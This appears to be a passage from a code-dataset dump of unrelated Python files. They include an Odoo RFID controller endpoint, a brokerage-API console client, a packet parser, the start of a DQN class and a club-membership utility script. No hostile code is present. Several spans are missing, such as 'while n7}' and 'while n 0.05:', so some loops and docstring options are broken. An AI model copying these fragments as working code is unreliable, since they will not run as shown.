(3*8)) & 0xFF,\n (command.rights_mask >> (2*8)) & 0xFF,\n (command.rights_mask >> (1*8)) & 0xFF,\n (command.rights_mask >> (0*8)) & 0xFF,\n )\n rights_data = ''.join(list('0' + ch for ch in rights_data))\n rights_mask = ''.join(list('0' + ch for ch in rights_mask))\n json_cmd['cmd']['d'] = card_num + rights_data + rights_mask\n\n if command.cmd == 'D7':\n dt = datetime.datetime.now()\n dt += WebRfidController._get_tz_offset(command.webstack_id)\n\n json_cmd['cmd']['d'] = '{:02}{:02}{:02}{:02}{:02}{:02}{:02}'.format(\n dt.second, dt.minute, dt.hour, dt.weekday() + 1, dt.day, dt.month, dt.year % 100\n )\n\n command.request = json.dumps(json_cmd)\n\n return json_cmd\n\n @http.route(['/hr/rfid/event'], type='json', auth='none', method=['POST'], csrf=False)\n def post_event(self, **post):\n print('post=' + str(post))\n t0 = time.time()\n if len(post) == 0:\n # Controllers with no odoo functionality use the dd/mm/yyyy format\n self._time_format = '%d.%m.%y %H:%M:%S'\n self._post = request.jsonrequest\n else:\n self._time_format = '%m.%d.%y %H:%M:%S'\n self._post = post\n _logger.debug('Received=' + str(self._post))\n\n if 'convertor' not in post:\n return self._parse_raw_data()\n\n self._vending_hw_version = '16'\n self._webstacks_env = request.env['hr.rfid.webstack'].with_user(1)\n self._webstack = self._webstacks_env.search(['|',('active', '=', True), ('active', '=', False),\n ('serial', '=', str(self._post['convertor'])) ])\n self._ws_db_update_dict = {\n 'last_ip': request.httprequest.environ['REMOTE_ADDR'],\n 'updated_at': fields.Datetime.now(),\n }\n try:\n if len(self._webstack) == 0:\n new_webstack = {\n 'name': 'Module ' + str(self._post['convertor']),\n 'serial': str(self._post['convertor']),\n 'key': self._post['key'],\n 'last_ip': request.httprequest.environ['REMOTE_ADDR'],\n 'updated_at': fields.Datetime.now(),\n 'available': 'a'\n }\n self._webstacks_env.create(new_webstack)\n return { 'status': 400 }\n\n if self._webstack.key != self._post['key']:\n self._report_sys_ev('Webstack key and key in json did not match')\n return { 'status': 400 }\n\n if not self._webstack.active:\n self._webstack.write(self._ws_db_update_dict)\n self._report_sys_ev('Webstack is not active')\n return { 'status': 400 }\n\n result = {\n 'status': 400\n }\n\n if 'heartbeat' in self._post:\n result = self._parse_heartbeat()\n elif 'event' in self._post:\n result = self._parse_event()\n elif 'response' in self._post:\n result = self._parse_response()\n\n self._webstack.write(self._ws_db_update_dict)\n t1 = time.time()\n _logger.debug('Took %2.03f time to form response=%s' % ((t1-t0), str(result)))\n print('ret=' + str(result))\n return result\n except (KeyError, exceptions.UserError, exceptions.AccessError, exceptions.AccessDenied,\n exceptions.MissingError, exceptions.ValidationError, exceptions.DeferredException,\n psycopg2.DataError, ValueError) as __:\n request.env['hr.rfid.event.system'].sudo().create([{\n 'webstack_id': self._webstack.id,\n 'timestamp': fields.Datetime.now(),\n 'error_description': traceback.format_exc(),\n 'input_js': json.dumps(self._post),\n }])\n _logger.debug('Caught an exception, returning status=500 and creating a system event')\n print('Caught an exception, returning status=500 and creating a system event')\n return { 'status': 500 }\n except BadTimeException:\n t = self._post['event']['date'] + ' ' + self._post['event']['time']\n ev_num = str(self._post['event']['event_n'])\n controller = self._webstack.controllers.filtered(lambda r: r.ctrl_id == self._post['event']['id'])\n sys_ev_dict = {\n 'webstack_id': self._webstack.id,\n 'controller_id': controller.id,\n 'timestamp': fields.Datetime.now(),\n 'event_action': ev_num,\n 'error_description': 'Controller sent us an invalid date or time: ' + t,\n 'input_js': json.dumps(self._post),\n }\n request.env['hr.rfid.event.system'].sudo().create(sys_ev_dict)\n _logger.debug('Caught a time error, returning status=200 and creating a system event')\n print('Caught a time error, returning status=200 and creating a system event')\n return { 'status': 200 }\n\n def _parse_raw_data(self):\n if 'serial' in self._post and 'security' in self._post and 'events' in self._post:\n return self._parse_barcode_device()\n\n return { 'status': 200 }\n\n def _parse_barcode_device(self):\n post = self._post\n ret = request.env['hr.rfid.raw.data'].create([{\n 'do_not_save': True,\n 'identification': post['serial'],\n 'security': post['security'],\n 'data': json.dumps(post),\n }])\n\n ret_data = ret.return_data\n\n if ret.do_not_save is True:\n ret.unlink()\n\n return json.loads(ret_data)\n","sub_path":"hr_rfid/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":34540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"25293708","text":"# Python https://docs.python.org/3.1/tutorial/datastructures.html\n\nname = \"Dan\" # string\nage = 24 # int\nfavorites = [\"Cycling\", \"Eatsies\", \"Smiling\"] # list of strings\n\n# object (dictionary = key : value)\nperson = {\n 'name' : name,\n 'age' : age,\n 'favorites' : favorites\n}\n\nprint(person)\n","sub_path":"basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"151498106","text":"#!/usr/bin/env python3\n#Autor:JoséFacundoBogado, dedicado a Clara(I❤U)\nimport requests\nimport json\nimport sys\nimport os\nimport time\n\ndef borrarPant():\n if os.name == \"posix\":\n os.system (\"clear\")\n elif os.name == \"ce\" or os.name == \"nt\" or os.name == \"dos\":\n os.system (\"cls\")\n\ndef menu():\n print('FlashTrading 0.1 (pre-alfa)')\n print('''¿Que desea hacer? :\n [0] Estado de Cuenta\n [1] Ver Portafolio\n [2] Consultar la cotización de un titulo\n [3] Ver operaciones\n [4] Comprar/Vender\n [5] Ver Paneles de cotizaciones\n [6] Serie historica\n [7] Calculadora de bonos\n [8] Acerca de...\n [9] Salir\n ''')\n n = input('(Ingrese el número):\\t')\n borrarPant()\n if n=='0':\n estado()\n elif n=='1':\n miportafolio()\n elif n=='2':\n consulta()\n elif n=='3':\n operaciones()\n elif n=='5':\n mostrarpanel()\n elif n=='8':\n acercade()\n elif n=='9':\n salir()\n else:\n borrarPant()\n print('\\n\\n\\tERROR: Ingrese el numero de la opción que desee')\n time.sleep(2)\n menu()\n\ndef estado():\n print('FlashTrading 0.1 (pre-alfa)')\n data = {\n 'Authorization': c,\n }\n r = requests.get(\"https://api.invertironline.com/api/estadocuenta\", headers=data)\n estado = json.loads(r.text)\n n=0\n print(\n '\\nEstado de cuenta nº: ', estado['cuentas'][0]['numero'],\n '\\n\\t\\t\\t\\t[Total en Pesos:$',estado['totalEnPesos'],']\\n',\n '\\nCuenta',estado['cuentas'][0]['tipo'],\n '\\t[Total:\\t$',estado['cuentas'][0]['total'],']\\n',\n '\\n\\t\\tActivos Valorizados\\t\\t\\t$',estado['cuentas'][0]['titulosValorizados'],\n '\\n\\t\\tComprometido\\t\\t\\t\\t$',estado['cuentas'][0]['comprometido'],\n '\\n\\t\\tDisponible para operar\\t\\t\\t$','{:.2f}'.format((estado['cuentas'][0]['saldos'][0]['saldo']+estado['cuentas'][0]['saldos'][1]['saldo']+estado['cuentas'][0]['saldos'][2]['saldo']+estado['cuentas'][0]['saldos'][3]['saldo'])-estado['cuentas'][0]['comprometido']),\n '\\n\\t\\tDisponible en cuenta\\t\\t\\t$','{:.2f}'.format(estado['cuentas'][0]['disponible']),\n '\\n\\t\\t\\tSaldo a acreditarse (Inmediato) $',estado['cuentas'][0]['saldos'][1]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (24hs)\\t$',estado['cuentas'][0]['saldos'][0]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (48hs)\\t$',estado['cuentas'][0]['saldos'][1]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (72hs)\\t$',estado['cuentas'][0]['saldos'][2]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (+72hs)\\t$',estado['cuentas'][0]['saldos'][3]['saldo'],\n '\\n\\nCuenta',estado['cuentas'][1]['tipo'],\n '\\t[Total:\\tU$S',estado['cuentas'][1]['total'],']\\n',\n '\\n\\t\\tActivos Valorizados\\t\\t\\tU$S',estado['cuentas'][1]['titulosValorizados'],\n '\\n\\t\\tComprometido\\t\\t\\t\\tU$S',estado['cuentas'][1]['comprometido'],\n '\\n\\t\\tDisponible para operar\\t\\t\\t$','{:.4f}'.format(estado['cuentas'][1]['saldos'][1]['saldo']+estado['cuentas'][1]['saldos'][2]['saldo']+estado['cuentas'][1]['saldos'][3]['saldo']-estado['cuentas'][1]['comprometido']),\n '\\n\\t\\tDisponible en cuenta\\t\\t\\tU$S',estado['cuentas'][1]['disponible'],\n '\\n\\t\\t\\tSaldo a acreditarse (Inmediato) U$S',estado['cuentas'][1]['saldos'][1]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (24hs)\\tU$S',estado['cuentas'][1]['saldos'][0]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (48hs)\\tU$S',estado['cuentas'][1]['saldos'][1]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (72hs)\\tU$S',estado['cuentas'][1]['saldos'][2]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (+72hs)\\tU$S',estado['cuentas'][1]['saldos'][3]['saldo'],'\\n',\n\n )\n #+estado['cuentas'][0]['saldos'][1]['saldo']+estado['cuentas'][0]['saldos'][2]['saldo']+estado['cuentas'][0]['saldos'][3]['saldo']-estado['cuentas'][0]['comprometido'],\n a=input('presione enter para ir al menu de opciones')\n borrarPant()\n menu()\n\ndef miportafolio():\n print('FlashTrading 0.1 (pre-alfa)')\n data = {\n 'Authorization': c,\n }\n r = requests.get(\"https://api.invertironline.com/api/portafolio\", headers=data)\n port = json.loads(r.text)\n print('Portafolio:')\n n=0\n while n< len(port['activos']):\n ls = port['activos'][n]['titulo']['descripcion']\n ls2 = port['activos'][n]['ultimoPrecio']\n ls3 = port['activos'][n]['cantidad']\n ls4 = port['activos'][n]['titulo']['moneda']\n ls5 = port['activos'][n]['gananciaPorcentaje']\n ls6 = port['activos'][n]['valorizado']\n ls7 = port['activos'][n]['titulo']['simbolo']\n ls8 = port['activos'][n]['variacionDiaria']\n ls9 = port['activos'][n]['gananciaDinero']\n print(ls,'\\n\\t\\tSimbolo:\\t\\t',ls7,'\\n\\t\\tNominales:\\t\\t',ls3,'\\n\\t\\tCotización:\\t\\t $',\n ls2,ls4,'\\n\\t\\tVariacion desde Compra:\\t',ls5,'%','\\n\\t\\tValorizado:\\t\\t $',ls6,ls4,\n '\\n\\t\\tVariación Diaria:\\t',ls8,'%','\\n\\t\\tGanancia Nominal:\\t $',ls9,ls4,'\\n')\n n+=1\n a=input('presione enter para ir al menu de opciones')\n borrarPant()\n menu()\n\ndef consulta():\n print('FlashTrading 0.1 (pre-alfa)\\n\\n')\n merc='bcba'\n simb=input('\\nIngrese el simbolo del titulo que desea consultar\\n(ejemplo: pamp, alua, cres):\\t')\n host='https://api.invertironline.com/api/'+merc+'/Titulos/'+simb+'/cotizacion'\n host2='https://api.invertironline.com/api/'+merc+'/Titulos/'+simb\n data = {\n 'Authorization': c,\n 'mercado':merc,\n 'simbolo':simb,\n 'model.simbolo':simb,\n 'model.mercado':merc\n }\n r = requests.get(host, headers=data)\n r2 = requests.get(host2, headers=data)\n borrarPant()\n cotizacion=json.loads(r.text)\n datos=json.loads(r2.text)\n print(datos['descripcion'],' - [',datos['simbolo'],']\\n',\n '\\núltimo precio: \\t$',cotizacion['ultimoPrecio'],'\\t\\tApertura: $',cotizacion['apertura'],'\\tMáximo: $',cotizacion['maximo'],'\\tMínimo: $',cotizacion['minimo'],\n '\\nCierre Anterior: ',cotizacion['cierreAnterior'],\n '\\nVariación:\\t', cotizacion['variacion'],'%',\n '\\n')\n print('-CAJA DE PUNTAS-\\n')\n print('\\tCOMPRA\\t\\tVENTA')\n print('Cantidad','Precio','\\tPrecio',' Cantidad')\n n=0\n while n< len(cotizacion['puntas']):\n print('{:^8}'.format(str(int(cotizacion['puntas'][n]['cantidadCompra']))),'$',cotizacion['puntas'][n]['precioCompra'],\n '\\t{:9}'.format('$'+str(cotizacion['puntas'][n]['precioVenta'])),'{:^8}'.format(str(int(cotizacion['puntas'][n]['cantidadVenta']))))\n n+=1\n k=input('presione enter para volver al menú')\n borrarPant()\n menu()\n\ndef mostrarpanel():\n hostpanel='https://api.invertironline.com/api/Cotizaciones/acciones/merval/argentina?panelCotizacion.instrumento=acciones&panelCotizacion.panel=merval&panelCotizacion.pais=argentina&api_key='+c\n body={\n 'Authorization':c,\n 'panelCotizacion.instrumento':'acciones',\n 'panelCotizacion.panel':'merval',\n 'panelCotizacion.pais':'argentina'\n }\n panel = requests.get(hostpanel, headers=body)\n merv=json.loads(panel.text)\n n=0\n borrarPant()\n print('''\n----------------------------------[[MERVAL]]-----------------------------------------------\n-------------------------------------------------------------------------------------------\n Último Variación -----Compra----Puntas----Venta----- Apertura Máximo Mínimo Cierre Cantidad Monto\nSimbolo Precio % Cantidad Precio - Precio Cantidad Anterior Operaciones Operado\n''')\n while n7}'.format('$'+str(merv['titulos'][n]['puntas']['precioVenta'])),'{:^10}'.format(str(int(merv['titulos'][n]['puntas']['cantidadVenta']))),\n '{:8}'.format('$ '+str(merv['titulos'][n]['apertura'])),'{:8}'.format('$ '+str(merv['titulos'][n]['maximo'])),'{:9}'.format('$ '+str(merv['titulos'][n]['minimo'])),\n '{:9}'.format('$ '+str(merv['titulos'][n]['ultimoCierre'])),'{:12}'.format(str(int(merv['titulos'][n]['cantidadOperaciones']))),'{:9}'.format('$ '+str(merv['titulos'][n]['volumen']))\n )\n n+=1\n w=input('presione enter para volver al menú')\n menu()\n\ndef operaciones():\n print('FlashTrading 0.1 (pre-alfa)\\n')\n print('''Seleccione que tipo de operaciones desea:\n [1] Todas\n [2] Pendientes\n [3] Terminadas\n [4] Canceladas\n ''')\n tipo=input('Ingrese la opción: ')\n if tipo=='1':\n tipo='todas'\n elif tipo=='2':\n tipo=\"pendientes\"\n elif tipo=='3':\n tipo='terminadas'\n elif tipo=='4':\n tipo='canceladas'\n else:\n borrarPant()\n print('Error. Ingrese un numero del 1 al 4')\n time.sleep(2)\n operaciones()\n borrarPant()\n #print(tipo)\n print('Ingrese la fecha desde la que desea consultar. (formato \"aaaa-mm-dd\", ejemplo: 2018-07-24)')\n print('***Si deja vacio se tomara el último mes por defecto')\n fechadesde=input()\n print('\\nIngrese la fecha hasta la que desea consultar. (formato \"aaaa-mm-dd\", ejemplo: 2019-01-06)')\n print('***Si deja vacio se tomara hoy por defecto')\n fechahasta=input()\n data = {\n 'Authorization': c,\n 'filtro.numero':'',\n 'filtro.estado':tipo,\n 'filtro.fechaDesde':fechadesde,\n 'filtro.fechaHasta':fechahasta\n }\n url='https://api.invertironline.com/api/operaciones?filtro.estado='+tipo+'&filtro.fechaDesde='+fechadesde+'&filtro.fechaHasta='+fechahasta\n r = requests.get(url, headers=data)\n operetas = json.loads(r.text)\n n=0\n print('''\n | Nº de |Fecha de | Tipo | Estado | Símbolo | Cantidad | Precio | Fecha | Monto | Precio |\n |trans. | orden | | | | /Monto | orden | Operada | Operado | operado |\n ---------------------------------------------------------------------------------------------------------------''')\n while n 0.05:\r\n\t\tmaster_list.append('|')\r\n\tprev_ts = timestamp\r\n\r\n# for item in master_list:\r\n# \tif item == '|':\r\n# \t\tprint()\r\n# \telse:\r\n# \t\tprint(hex(item), end=' ')","sub_path":"packet_parse/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"449049339","text":"from collections import deque\nimport gym\n\n\nclass DQN:\n \"\"\"\n Adapted from https://gist.github.com/yashpatel5400/049fe6f4372b16bab5d3dab36854f262#file-mountaincar-py\n https://towardsdatascience.com/reinforcement-learning-w-keras-openai-dqns-1eed3a5338c\n\n Implements a simple fully connected model with dropout to learn the behaviour from observations.\n Can solve the following environments:\n + MountainCar-v0\n \"\"\"\n\n def __init__(self,\n env=\"MountainCar-v0\",\n gamma=0.95,\n epsilon=1.0,\n epsilon_min=0.01,\n epsilon_decay=0.995,\n learning_rate=0.01,\n replay_buffer_size=2000,\n tau=0.05):\n\n self.env = gym.make(env)\n\n print(\"Action space: {}\".format(self.env.action_space))\n print(\"Observation/State space: {}\".format(self.env.observation_space))\n\n # instead of always learning from the most recent trial, we random sample from the replay buffer. This helps\n # with convergence when using NN function approximators, since it assures that our samples (trials) are\n # independently distributed. Also, this enables us to learn while considering the best action to take,\n # independently of the most recent trial.\n self.replay_buffer = deque(maxlen=replay_buffer_size)\n\n self.gamma = gamma # future reward discount factor (< 1)\n self.epsilon = epsilon # probability of exploring (taking random action)\n\n # we want to explore more in the beginning, so init with high epsilon and let epsilon decay over time\n self.epsilon_decay = epsilon_decay\n\n self.epsilon_min = epsilon_min # the minimum exploration probability we want to maintain\n self.learning_rate = learning_rate\n\n self.tau = tau # the factor by how much slower we update the weights of the target network\n\n # this is the model used to do the actual predictions for the action\n self.model = None\n\n # deepmind's trick for better convergence in complex environments: https://arxiv.org/abs/1312.5602\n # this is the final model will use after training, which learns slower the training model.\n # since we train on each time step, we also change the goal on each timestep. This means that the gradients\n # change a lot, which makes it hard to converge.\n self.target_model = None\n\n","sub_path":"algos/dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221685562","text":"#!/usr/bin/env python3\n\n# File: utils.py\n\n\"\"\"\n\"utils.py\" is an utility providing functionality for usage and\nmaintanance of the Bolinas Rod and Boat Club membership records.\nMost commands deal with a csv file named \"./Data/memlist.csv\" so for\nthese it is the default input file.\nLabels and Envelopes (along with the '-P ' option) have\nbeen deprecated but the code left in place incase anyone ever\nwishes to revive them. Current usage replaces them with emails and\nletters (which can be prepared using the 'prepare_mailing' command.)\nConsult the README file for further info.\n\nUsage:\n ./utils.py [ ? | --help | --version]\n ./utils.py ck_data [-O -d -i -A -S -X -C -o ]\n ./utils.py show [-O -i -A -S -o ]\n ./utils.py names_only [-O -w -i -o ]\n ./utils.py report [-O -i -A -S -o ]\n ./utils.py stati [-O -D -M -B --mode -i -A -S -o ]\n ./utils.py zeros [-O -i -o -o ]\n ./utils.py extra_charges [-O -w -f -i -o -j ]\n ./utils.py payables [-O -T -w -i -o ]\n ./utils.py show_mailing_categories [-O -T -w -o ]\n ./utils.py prepare_mailing --which [-O --oo -p -i -j --dir --cc --bcc ATTACHMENTS...]\n ./utils.py thank [-t <2thank> -O -p -i -j --dir -o -e ]\n ./utils.py display_emails [-O] -j [-o ]\n ./utils.py send_emails [-O --mta --emailer ] -j \n ./utils.py print_letters --dir [-O --separator -o outfile]\n ./utils.py emailing [-O -i -F ] --subject -c [ATTACHMENTS...]\n ./utils.py restore_fees [-O -i -X -o -e ]\n ./utils.py fee_intake_totals [-O -i -o -e ]\n ./utils.py (labels | envelopes) [-O -i -P -o -x ]\n ./utils.py wip [-O -o 2check]\n ./utils.py new_db -F function [-O -i -o -e ]\n\nOptions:\n -h --help Print this docstring. Best piped through pager.\n --version Print version.\n -A Applicant data file.\n --bcc Comma separated listing of bcc recipients\n --cc Comma separated listing of cc recipients\n -c The name of a file containing the body of an email.\n -C Contacts data file.\n -d Include details: fee inconsistency for ck_data,\n -dir The directory to be created and/or read\n containing letters for batch printing.\n -e Specify name of a file to which an error report\n can be written. [default: stdout]\n --emailer Use bash (via smtp or mutt) or python to send\n emails. [default: python]\n -f Specify output format of 'extra_charges' command.\n Possible choices are:\n 'table' listing of names /w fees tabulated (=> 2 columns.)\n 'listing' same format as Data/extra_fees.txt\n 'listings' side by side lists (best use landscape mode.)\n [default: table]\n -F Name of function to apply. (new_db command)\n -i Specify file used as input. Usually defaults to\n the MEMBERSHIP_SPoT attribute of the Club class.\n -D include demographic data } These pertain\n -M include meeting dates } to applicant\n -B include backers/sponsors } reports.\n -j Specify a json formated file (whether for input or output\n depends on context.)\n --mode In stati command signals stati to show:\n If not specified, all stati are reported.\n | --mode :\n only applicants are reported\n | --mode : only report stati listed.\n --mta Specify mail transfer agent to use. Choices are:\n clubg club's gmail account [default: clubg]\n akg my gmail account\n easy my easydns account\n -O Show Options/commands/arguments. Used for debugging.\n -o Specify destination. Choices are stdout, printer, or\n the name of a file. [default: stdout]\n --oo Owing_Only: Only consider members with dues/fees outstanding.\n (Sets owing_only attribute of instance of Club.)\n -P This option will probably be redacted since old\n methods of mailing are no longer used.\n Defaults are A5160 for labels & E000 for envelopes.\n -p Deals with printer variablility; ensures correct\n alignment of text when printing letters. [default: X6505_e1]\n -s Report only the stati listed (separated by\n member.SEPARATOR.\n -S Specify file from which to retrieve sponsors.\n --separator A string. [default: \\f]\n --subject The subject line of an email.\n -t <2thank> A csv file in same format as memlist.csv showing\n recent payments. Input for thank_cmd.\n [default: Info/2thank.csv]\n -T Present data in columns (a Table) rather than a long list.\n Used with the 'payables' and 'show_mailing_categories\n command. May not have much effect without setting -w\n to a high number.\n -w Maximum number of characters per line in output.\n [default: 95]\n --which Specifies type/subject of mailing.\n -x Used by commands not in use. (Expect redaction)\n -X Extra Fees data file.\n\nCommands:\n When run without a command, suggests ways of getting help.\n ck_data: Checks all the club's data bases for consistency.\n Assumes (user must assert) a fresh export of the gmail\n contacts list. Options:\n | -d Include fee inconsistencies (which are expected\n when some have paid.)\n show: Returns membership demographics a copy of which can then\n be sent to the web master for display on the web site.\n names_only: Returns a listing of members and applicants- names\n only, without any demographics. If -w is 0, it's a single\n column, otherwise output is in tabular.\n report: Prepares a 'Membership Report\".\n stati: Returns a listing of stati (entries in 'status' field.)\n if set can be 'applicants' (Applicants only will be\n shown) or a member.SEPARATOR separated set of stati\n (indicating which stati to show.)\n May also include any combination of -D, -M, -S to\n include adress/demographics, meeting dates &/or sponsors\n for applicants.\n usps: Creates a csv file containing names and addresses of\n members without an email address who therefore receive Club\n minutes by post. Also includes any one with a 'be' or an 's'\n status (... a mechanism for sending a copy to the secretary.)\n extra_charges: Reports on members paying extra charges (for\n kayak storage, mooring &/or dock usage.)\n | -f -specify listing, listings or table format.\n | -w -specify maxm # of chars per line in output.\n | -j -creat a json file. (This was\n but is no longer required by the restore_fees_cmd.)\n payables: Reports on non zero money fields.\n | -T Present as a table rather than a listing.\n | -w Maximum number of characters per line if -T.\n show_mailing_categories: Sends a list of possible entries for the\n '--which' parameter required by the prepare_mailings command.\n (See the 'content_types' dict in content.py.)\n prepare_mailing: Demands a <--which> argument to specify the\n content and the custom function(s) to be used. Try the\n 'show_mailing_categories' command for a list of choices.\n The command line arguments may end with zero or more names\n of files which are to be added as attachments to the emails.\n Other parameters have defaults set.\n '--oo' Send request for fee payment only to those with an\n outstanding balance. This is relevant only to mailings\n relating to dues and fees. Without this option mailings go\n to all members (including those with credit or 0 balance.\n '-p ' specifies printer to be used for letters.\n '-i ' membership data csv file.\n '-j ' where to dump prepared emails.\n '---dir ' where to file letters.\n thank: Reads the file specified by -t , applies payments\n specified there in to the -i and prepares thank you\n letter/email acknowledging receipt of payment and showing\n current balance(s.) See prepare_mailing command for further\n details.\n display_emails: Provides an opportunity to proof read the emails.\n send_emails: Sends out the emails found in the -j .\n Each mta has its own security requirements and each emailer\n has its own way of implementing them. Check the\n Notes/emailREADME for details. Note that not all\n combinations of mta and emailer are working but the following\n does: \"--mta clubg --emailer python\".\n within the ./Notes directory (./Notes/msmtprc.)\n print_letters: Sends the files contained in the directory\n specified by the --dir parameter. Depricated in favour of\n simply using the lpr utility: $ lpr ./Data/MailDir/*\n restore_fees: Use this command to populate each member's record\n with what they will owe for the next club year. Respects any\n existing credits. Best done after all dues and fees have been\n paid. (Will abort if any dues or fees are still outstanding.)\n Results are either placed into a file specified by the '-o'\n option (if provided) or placed into a file named as a\n concatination of \"new_\" and the input file. One can then\n mannually check the new file and rename it if all is well.\n emailing: Initially developed to allow sending of attachments.\n Since attachments are now possible using the send_mailing\n command (at least with emailer python) this command will\n most likely be redacted.\n fee_intake_totals: Input file should be a 'receipts' file with a\n specific format. It defaults to 'Data/receipts-YYYY.txt'\n where YYYY is the current year. Output yields subtotals and\n the grand total which can be copy/pasted into the 'receipts'\n file.\n labels: print labels. | default: -P A5160 | Both\n envelopes: print envelopes. | default: -P E000 | redacted.\n wip: \"work in progress\" Used for development/testing.\n\"\"\"\n\nimport os\nimport shutil\nimport csv\nimport codecs\nimport sys\nimport time\nimport random\nimport json\nimport subprocess\nfrom docopt import docopt\nimport sys_globals as glbs\nimport member\nimport helpers\nimport content\nimport data\nimport Pymail.send\nimport Bashmail.send\nfrom rbc import Club\n\n\nTEXT = \".txt\" # } Used by \nCSV = \".csv\" # } command.\n\nTEMP_FILE = \"2print.temp\" # see function\n\nargs = docopt(__doc__, version=glbs.VERSION)\nfor arg in args:\n if type(args[arg]) == str:\n if args[arg] and (args[arg][0] == '='):\n args[arg] = args[arg][1:]\ntry:\n max_width = int(args['-w'])\nexcept ValueError:\n print(\n \"Value of '-w' command line argument must be an integer.\")\n sys.exit()\nif args['-O']:\n print(\"Arguments are...\")\n res = sorted([\"{}: {}\".format(key, args[key]) for key in args])\n ret = helpers.tabulate(res, max_width=max_width, separator=' ')\n print('\\n'.join(ret))\n response = input(\"...end of arguments. Continue? \")\n if response and response[0] in 'yY':\n pass\n else:\n sys.exit()\n\nif args[\"-p\"] not in content.printers.keys():\n print(\"Invalid '-p' parameter! '{}'\".format(args['-p']))\n sys.exit()\n\n\ndef assign_default_files(club, args):\n \"\"\"\n Assigns the following attributes to :\n infile, and the following 'spot' file names:\n applicant_spot, sponsor_spot,\n extra_fees_spot, contacts_spot\n \"\"\"\n if args['-i']:\n club.infile = args['-i']\n else:\n club.infile = Club.MEMBERSHIP_SPoT\n if args['-A']:\n club.applicant_spot = args['-A']\n else:\n club.applicant_spot = Club.APPLICANT_SPoT\n if args['-S']:\n club.sponsor_spot = args['-S']\n else:\n club.sponsor_spot = Club.SPONSORS_SPoT\n if args['-X']:\n club.extra_fees_spot = args['-X']\n else:\n club.extra_fees_spot = Club.EXTRA_FEES_SPoT\n if args['-C']:\n club.contacts_spot = args['-C']\n else:\n club.contacts_spot = Club.CONTACTS_SPoT\n\n\ndef confirm_file_present_and_up2date(file_name):\n \"\"\"\n Asks user to confirm that the file is current.\n Aborts the program if file_name doesn't exist.\n Used for the gmail contacts.csv file.\n \"\"\"\n if not os.path.exists(file_name):\n print(\"File '{}' expected but not found.\".format(file_name))\n sys.exit()\n response = input(\"Is file '{}' present and up to date? \"\n .format(file_name))\n if response and response[0] in \"Yy\":\n return True\n else:\n print(\"Update the file before rerunning utility.\")\n sys.exit()\n\n\ndef output(data, destination=args[\"-o\"], announce_write=True):\n \"\"\"\n Sends data (text) to destination as specified\n by the -o command line parameter (which\n defaults to stdout.)\n Reports file manipulations to stdout.\n \"\"\"\n if destination == 'stdout':\n print(data)\n elif destination == 'printer':\n with open(TEMP_FILE, \"w\") as fileobj:\n fileobj.write(data)\n print('Data written to temp file \"{}\".'.format(fileobj.name))\n subprocess.run([\"lpr\", TEMP_FILE])\n subprocess.run([\"rm\", TEMP_FILE])\n print('Temp file \"{}\" deleted after printing.'\n .format(fileobj.name))\n else:\n with open(destination, \"w\") as fileobj:\n fileobj.write(data)\n if announce_write:\n print('Data written to \"{}\".'.format(fileobj.name))\n\n\n# Medium specific classes:\n# e.g. labels, envelopes, ...\n# These classes, one for each medium, need never be instantiated.\n# They are used only to maintain a set of constants and\n# are named beginning with a letter (A - Avery, E - Envelope, ...)\n# followed by a 4 digit number: A5160, E0000, ... .\n# Clients typically refer to these as .\n\n\nclass Dummy(object):\n \"\"\" REDACTED\n a Dummy class for use when templates are not required\"\"\"\n formatter = \"\"\n\n @classmethod\n def self_check(cls): # No need for the sanity check in this case\n pass\n\n\nclass E0000(object):\n \"\"\"\n REDACTED.\n Custom envelopes used by the Bolinas Rod & Boat Club\n to send out requests for dues.\n \"\"\"\n n_chars_wide = 60\n n_lines_long = 45\n n_labels_page = 1\n n_lines_per_label = 10\n\n n_chars_per_field = 25\n separation = (34, )\n top_margin = 32\n\n left_formatter = (\" \" * separation[0] +\n \"{{:<{}}}\".format(n_chars_per_field))\n right_formatter = (\" \" * separation[0] + \"{{:>{}}}\"\n .format(n_chars_per_field))\n empty_line = \"\"\n\n @classmethod\n def self_check(cls):\n \"\"\"\n No need for the sanity check in this case.\n \"\"\"\n pass\n\n\nclass A5160(object):\n \"\"\"\n Avery 5160 labels 3 x 10 grid\n zero based:\n 1, 28, 56\n 3, 9, 15, 21, 27, 33, 39, 45, 51, 57\n (max content 5 lines of 25 characters each)\n Uses \"letter size\" blanks.\n BUT: there was a complication- my printer \"wraps\" at 80 chars.\n So each line could not exceed 80 characters.\n \"\"\"\n\n # The first two are restrictions imposed by my printer!\n n_chars_wide = 80 # The Avery labels are wider ?84 I think?\n n_lines_long = 64\n\n n_labels_per_page = 30\n n_labels_per_row = 3\n n_rows_per_page = n_labels_per_page // n_labels_per_row\n n_lines_per_label = 6 # Limits 'spill over' of long lines.\n\n # Because of the n_chars_wide restriction, can't use the full\n # width of the labels :\n n_chars_per_field = 23\n # /------left_margin (spaces before 1st field in row)\n # | /----between 1st and 2nd\n # | | /--between 2nd & 3rd\n # | | | # These numbers refer to the room to be\n # v v v # left before and between the labels.\n separation = (2, 4, 5)\n line_length_needed = 0\n for n in separation:\n line_length_needed += n\n line_length_needed += n_labels_per_row * n_chars_per_field\n\n top_margin = 2 # The number of blank lines at top of each page.\n\n empty_label = [\"\"] * n_lines_per_label\n\n left_formatter = (\"{{:<{}}}\".format(n_chars_per_field))\n right_formatter = (\"{{:>{}}}\".format(n_chars_per_field))\n empty_line = left_formatter.format(\" \")\n\n def __init__(self):\n pass\n\n @classmethod\n def self_check(cls):\n \"\"\"\n Provides a 'sanity check'.\n \"\"\"\n if cls.line_length_needed > 